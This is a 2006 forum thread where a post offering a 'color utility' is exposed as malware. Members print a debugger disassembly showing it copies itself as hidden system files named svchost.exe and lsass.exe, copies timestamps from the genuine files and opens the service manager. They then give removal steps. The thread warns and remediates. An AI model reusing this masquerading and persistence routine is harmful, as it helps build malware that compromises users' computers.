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My first utility

Started by q4lambda, June 28, 2006, 09:37:19 AM

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Check out my awesome color utility:

Made it yesterday with masm. What do you think?


Doesn't work for me. (Windows XP Home edition). No activity in Task Manager.
Don't have time to debug. Maybe latter.

white scorpion

damn!!! keep your junk of this site!

00401727 >/$ 68 BF494000    PUSH colors.004049BF                     ; /Arg2 = 004049BF
0040172C  |. 6A 01          PUSH 1                                   ; |Arg1 = 00000001
0040172E  |. E8 99070000    CALL colors.00401ECC                     ; \colors.00401ECC
00401733  |. 83F8 01        CMP EAX,1
00401736  |. 0F84 92020000  JE colors.004019CE
0040173C  |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
00401741  |. 68 BF494000    PUSH colors.004049BF                     ; |PathBuffer = colors.004049BF
00401746  |. 6A 00          PUSH 0                                   ; |hModule = NULL
00401748  |. E8 13070000    CALL <JMP.&kernel32.GetModuleFileNameA>  ; \GetModuleFileNameA
0040174D  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
0040174F  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
00401754  |. E8 2B070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
00401759  |. 68 C2404000    PUSH colors.004040C2                     ; /FileName = "c:\windows\svchost.exe"
0040175E  |. E8 D3060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401763  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401765  |. 68 C2404000    PUSH colors.004040C2                     ; |NewFileName = "c:\windows\svchost.exe"
0040176A  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
0040176F  |. E8 AA060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
00401774  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
00401776  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
0040177B  |. E8 04070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
00401780  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
00401782  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401787  |. E8 F8060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
0040178C  |. 68 DE404000    PUSH colors.004040DE                     ; /FileName = "c:\windows\lsass.exe"
00401791  |. E8 A0060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401796  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401798  |. 68 DE404000    PUSH colors.004040DE                     ; |NewFileName = "c:\windows\lsass.exe"
0040179D  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
004017A2  |. E8 77060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
004017A7  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
004017A9  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
004017AE  |. E8 D1060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
004017B3  |. 6A 00          PUSH 0                                   ; /Mode = OF_READ|OF_SHARE_COMPAT
004017B5  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017BA  |. 68 F8404000    PUSH colors.004040F8                     ; |FileName = "c:\windows\system32\svchost.exe"
004017BF  |. E8 AE060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017C4  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
004017C9  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
004017CE  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
004017D3  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
004017D8  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
004017DE  |. E8 71060000    CALL <JMP.&kernel32.GetFileTime>         ; \GetFileTime
004017E3  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
004017E9  |. E8 2A060000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
004017EE  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
004017F0  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017F5  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
004017FA  |. E8 73060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017FF  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
00401804  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401809  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
0040180E  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
00401813  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401819  |. E8 6C060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
0040181E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
00401824  |. E8 EF050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
00401829  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
0040182B  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
00401830  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401835  |. E8 38060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
0040183A  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
0040183F  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401844  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
00401849  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
0040184E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401854  |. E8 31060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
00401859  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
0040185F  |. E8 B4050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
00401864  |. 68 DB404000    PUSH colors.004040DB                     ;  ASCII " 1"
00401869  |. 68 C2404000    PUSH colors.004040C2                     ;  ASCII "c:\windows\svchost.exe"
0040186E  |. E8 0D080000    CALL colors.00402080
00401873  |. 68 F5404000    PUSH colors.004040F5                     ;  ASCII " 2"
00401878  |. 68 DE404000    PUSH colors.004040DE                     ;  ASCII "c:\windows\lsass.exe"
0040187D  |. E8 FE070000    CALL colors.00402080
00401882  |. 6A 02          PUSH 2
00401884  |. 6A 00          PUSH 0
00401886  |. 6A 00          PUSH 0
00401888  |. E8 83090000    CALL <JMP.&advapi32.OpenSCManagerA>

and a whole lot more where that came from...
Don't open this program!


I will have have time to debug from now on. :(


Quote from: TNick on June 28, 2006, 11:37:43 AM
I will have have time to debug from now on. :(

If your computer is still on you should be fine :wink

Windows XP has a lot of hoops to jump through to be able to do this stuff, and the only one he's made it through is getting the code onto the computer  :naughty: :cheekygreen:

All the same, I hope this results in the banning of an IP or something similar...


Zooba :U

white scorpion

open registry editor and search for c:\windows\lsass.exe & c:\windows\svchost.exe
remove those keys.
The original files are in C:\windows\system32\

Then reboot and remove c:\windows\lsass.exe & c:\windows\svchost.exe
both are hidden so you might want to use attrib -h first.
I haven't went through the rest of the code since i'm at work now, but if you still need help then let me know.

@TNick, i know how you feel, i feel the same way. But you might want to change your post a little since it's not allowed on the board  :(


Having had a look through most of the code, it seems to register some fake services (probably the two files you suggested Scorpion) to connect to IRC and send IP addresses. Admittedly, I haven't used some of the APIs in there before so I don't know exactly what they do, but this is definitely bound for being removed once the mods arrive.


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white scorpion